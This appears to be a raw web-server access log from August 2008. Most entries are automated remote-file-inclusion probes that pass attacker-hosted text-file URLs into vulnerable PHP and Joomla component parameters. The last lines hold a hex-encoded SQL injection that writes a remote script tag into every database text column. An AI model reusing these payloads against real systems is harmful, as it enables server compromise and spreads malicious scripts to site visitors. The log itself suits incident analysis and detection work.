80.67.19.125 - - [21/Aug/2008:19:59:40 -0500] "GET /logs/access_log.1214524800//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cookaround.com/yabbse1/impex/log/id.txt??? HTTP/1.1" 404 374 "-""libwww-perl/5.808"
80.67.19.125 - - [21/Aug/2008:19:59:40 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cookaround.com/yabbse1/impex/log/id.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.808"
80.67.19.125 - - [21/Aug/2008:19:59:40 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cookaround.com/yabbse1/impex/log/id.txt??? HTTP/1.1" 404 352 "-""libwww-perl/5.808"
208.115.34.17 - - [21/Aug/2008:20:00:32 -0500] "GET /logs/access_log.1203638400//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.myboso.com/alat/echo.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.813"
208.115.34.17 - - [21/Aug/2008:20:00:32 -0500] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.myboso.com/alat/echo.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.813"
208.115.34.17 - - [21/Aug/2008:20:00:32 -0500] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.myboso.com/alat/echo.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.813"
208.115.34.17 - - [21/Aug/2008:20:01:20 -0500] "GET /logs/access_log.1206230400//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.myboso.com/alat/echo.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.813"
66.98.250.45 - - [21/Aug/2008:20:01:30 -0500] "GET //?path%5Bdocroot%5D=http://www.tsw.ru/ips.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.65"
80.67.19.125 - - [21/Aug/2008:20:01:36 -0500] "GET /logs/access_log.1213401600//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cookaround.com/yabbse1/impex/log/id.txt??? HTTP/1.1" 404 374 "-""libwww-perl/5.808"
62.231.161.4 - - [21/Aug/2008:20:01:45 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.64"
62.231.161.4 - - [21/Aug/2008:20:01:45 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.64"
62.231.161.4 - - [21/Aug/2008:20:01:46 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.64"
62.231.161.4 - - [21/Aug/2008:20:01:46 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.64"
167.83.101.23 - - [21/Aug/2008:20:03:04 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
167.83.101.23 - - [21/Aug/2008:20:03:04 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
167.83.101.23 - - [21/Aug/2008:20:03:04 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
208.115.34.17 - - [21/Aug/2008:20:03:17 -0500] "GET /logs/access_log.1214179200/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.myboso.com/alat/echo.txt?? HTTP/1.1" 404 355 "-""libwww-perl/5.813"
217.79.182.204 - - [21/Aug/2008:20:04:07 -0500] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
217.79.182.204 - - [21/Aug/2008:20:04:08 -0500] "GET //bemarket/postscript/postscript.php?p_mode=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
209.91.23.231 - - [21/Aug/2008:20:04:32 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "http://www.google.com/search?hl=en&client=safari&rls=en&q=bert+grimm+flash&btnG=Search""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22"
209.91.23.231 - - [21/Aug/2008:20:04:32 -0500] "GET /tattoo/tat10.jpg HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22"
209.91.23.231 - - [21/Aug/2008:20:04:32 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22"
209.91.23.231 - - [21/Aug/2008:20:04:32 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22"
209.91.23.231 - - [21/Aug/2008:20:04:32 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22"
209.91.23.231 - - [21/Aug/2008:20:04:32 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22"
209.91.23.231 - - [21/Aug/2008:20:04:32 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22"
217.133.215.166 - - [21/Aug/2008:20:05:43 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.elettrostudio.ch/fr/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
217.133.215.166 - - [21/Aug/2008:20:05:43 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.elettrostudio.ch/fr/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
206.220.64.3 - - [21/Aug/2008:20:06:39 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://veldink.com/leqi/lajelid.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
206.220.64.3 - - [21/Aug/2008:20:06:40 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://veldink.com/leqi/lajelid.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
202.181.99.47 - - [21/Aug/2008:20:06:43 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://utilz.info/a4? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
202.181.99.47 - - [21/Aug/2008:20:06:44 -0500] "GET /lostpasswd.php?env[include_prefix]=http://utilz.info/a4? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
62.231.161.4 - - [21/Aug/2008:20:07:36 -0500] "GET /logs/access_log.1206230400///vwar/backup/errors.php?error=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.64"
62.231.161.4 - - [21/Aug/2008:20:07:36 -0500] "GET ///vwar/backup/errors.php?error=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.64"
62.231.161.4 - - [21/Aug/2008:20:07:37 -0500] "GET /logs///vwar/backup/errors.php?error=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.64"
66.98.250.45 - - [21/Aug/2008:20:07:38 -0500] "GET /logs/errors.php?error=http://www.tsw.ru/ips.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
66.98.250.45 - - [21/Aug/2008:20:07:38 -0500] "GET /errors.php?error=http://www.tsw.ru/ips.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
64.22.89.194 - - [21/Aug/2008:20:08:30 -0500] "GET /logs/access_log.1208044800//admin/editor2/spaw_control.class.php?spaw_root=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 348 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
64.22.89.194 - - [21/Aug/2008:20:08:30 -0500] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
202.181.99.47 - - [21/Aug/2008:20:08:59 -0500] "GET /logs/access_log.1214524800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://utilz.info/a4? HTTP/1.1" 404 370 "-""libwww-perl/5.805"
202.181.99.47 - - [21/Aug/2008:20:09:00 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://utilz.info/a4? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
202.181.99.47 - - [21/Aug/2008:20:09:00 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://utilz.info/a4? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
64.22.89.194 - - [21/Aug/2008:20:09:16 -0500] "GET /logs/access_log.1208044800//admin/editor2/spaw_control.class.php?spaw_root=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.812"
64.22.89.194 - - [21/Aug/2008:20:09:16 -0500] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.812"
64.22.89.194 - - [21/Aug/2008:20:09:16 -0500] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.812"
209.126.254.80 - - [21/Aug/2008:20:09:20 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.76"
209.126.254.80 - - [21/Aug/2008:20:09:20 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.76"
62.231.161.4 - - [21/Aug/2008:20:09:37 -0500] "GET /logs/access_log.1208044800///vwar/backup/errors.php?error=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.64"
66.98.250.45 - - [21/Aug/2008:20:10:19 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://www.tsw.ru/ips.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.65"
66.98.250.45 - - [21/Aug/2008:20:10:19 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.tsw.ru/ips.txt? HTTP/1.1" 200 96221 "-""libwww-perl/5.65"
62.231.161.4 - - [21/Aug/2008:20:11:21 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.64"
62.231.161.4 - - [21/Aug/2008:20:11:22 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.64"
62.231.161.4 - - [21/Aug/2008:20:11:27 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.64"
62.231.161.4 - - [21/Aug/2008:20:11:27 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.64"
202.181.99.47 - - [21/Aug/2008:20:11:41 -0500] "GET /logs/access_log.1206230400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://utilz.info/a4? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
202.181.99.47 - - [21/Aug/2008:20:11:42 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://utilz.info/a4? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
202.181.99.47 - - [21/Aug/2008:20:11:42 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://utilz.info/a4? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
62.231.161.4 - - [21/Aug/2008:20:13:13 -0500] "GET /logs/errors.php?error=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.64"
62.231.161.4 - - [21/Aug/2008:20:13:14 -0500] "GET /errors.php?error=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.64"
62.231.161.4 - - [21/Aug/2008:20:13:21 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.64"
62.231.161.4 - - [21/Aug/2008:20:13:22 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.64"
64.22.89.194 - - [21/Aug/2008:20:15:07 -0500] "GET /logs//include/write.php?dir=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.812"
64.22.89.194 - - [21/Aug/2008:20:15:07 -0500] "GET //include/write.php?dir=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.812"
64.22.89.194 - - [21/Aug/2008:20:15:10 -0500] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.812"
64.22.89.194 - - [21/Aug/2008:20:15:18 -0500] "GET /logs//include/write.php?dir=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.812"
64.22.89.194 - - [21/Aug/2008:20:15:18 -0500] "GET //include/write.php?dir=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.812"
80.67.19.125 - - [21/Aug/2008:20:15:29 -0500] "GET /logs/access_log.1214438400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cookaround.com/yabbse1/impex/log/id.txt??? HTTP/1.1" 404 374 "-""libwww-perl/5.808"
203.211.131.132 - - [21/Aug/2008:20:15:52 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
203.211.131.132 - - [21/Aug/2008:20:15:53 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
64.22.89.194 - - [21/Aug/2008:20:16:21 -0500] "GET //include/write.php?dir=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.812"
80.67.19.125 - - [21/Aug/2008:20:17:11 -0500] "GET /logs/access_log.1214179200//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cookaround.com/yabbse1/impex/log/id.txt??? HTTP/1.1" 404 374 "-""libwww-perl/5.808"
66.115.174.234 - - [21/Aug/2008:20:17:20 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
66.115.174.234 - - [21/Aug/2008:20:17:20 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
87.238.163.18 - - [21/Aug/2008:20:19:20 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
87.238.163.18 - - [21/Aug/2008:20:19:21 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
217.79.182.204 - - [21/Aug/2008:20:21:16 -0500] "GET /logs/access_log.1214438400//bemarket/postscript/postscript.php?p_mode=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 346 "-""libwww-perl/5.805"
217.79.182.204 - - [21/Aug/2008:20:21:16 -0500] "GET //bemarket/postscript/postscript.php?p_mode=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
217.79.182.204 - - [21/Aug/2008:20:21:17 -0500] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
203.211.131.132 - - [21/Aug/2008:20:23:42 -0500] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.810"
203.211.131.132 - - [21/Aug/2008:20:23:43 -0500] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
202.181.99.47 - - [21/Aug/2008:20:25:04 -0500] "GET /logs/access_log.1214438400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://utilz.info/a4? HTTP/1.1" 404 370 "-""libwww-perl/5.805"
62.231.161.4 - - [21/Aug/2008:20:25:11 -0500] "GET /logs/access_log.1214524800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 370 "-""libwww-perl/5.64"
62.231.161.4 - - [21/Aug/2008:20:25:12 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.64"
62.231.161.4 - - [21/Aug/2008:20:25:12 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.64"
87.238.163.18 - - [21/Aug/2008:20:25:16 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
87.238.163.18 - - [21/Aug/2008:20:25:16 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
64.22.89.194 - - [21/Aug/2008:20:25:32 -0500] "GET /logs/classes/adodbt/sql.php?classes_dir=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.812"
64.22.89.194 - - [21/Aug/2008:20:25:32 -0500] "GET /logs/classes/adodbt/sql.php?classes_dir=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.812"
64.22.89.194 - - [21/Aug/2008:20:25:32 -0500] "GET /classes/adodbt/sql.php?classes_dir=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.812"
64.22.89.194 - - [21/Aug/2008:20:25:32 -0500] "GET /classes/adodbt/sql.php?classes_dir=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.812"
64.22.89.194 - - [21/Aug/2008:20:25:45 -0500] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.812"
64.22.89.194 - - [21/Aug/2008:20:25:45 -0500] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.812"
64.22.89.194 - - [21/Aug/2008:20:25:57 -0500] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.812"
64.22.89.194 - - [21/Aug/2008:20:25:57 -0500] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.812"
123.203.78.203 - - [21/Aug/2008:20:30:12 -0500] "GET /logs/access_log.1206230400?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 195475 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Foxy/1; Foxy/1)"
123.203.78.203 - - [21/Aug/2008:20:30:12 -0500] "GET /logs/access_log.1206230400?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 195475 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Foxy/1; Foxy/1)"
123.203.78.203 - - [21/Aug/2008:20:30:13 -0500] "GET /logs/access_log.1208044800?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 122312 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Foxy/1; Foxy/1)"
